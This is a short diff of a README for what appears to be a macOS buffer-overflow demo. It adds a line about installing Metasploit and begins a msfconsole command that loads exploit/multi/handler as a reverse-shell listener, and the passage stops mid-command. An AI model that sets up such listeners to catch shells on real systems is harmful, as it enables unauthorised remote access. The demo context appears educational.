up2moon/macos-bof-demo/README.md

 ## 🛠 Reverse Shell Setup (optional)

-To prepare a listener for the reverse shell payload, start msfconsole with the following command:
+To prepare a listener for the reverse shell payload, you need to have Metasploit Framework installed.
+Then, start msfconsole with the following command:

 ```
 msfconsole -q -x "use exploit/multi/handler; \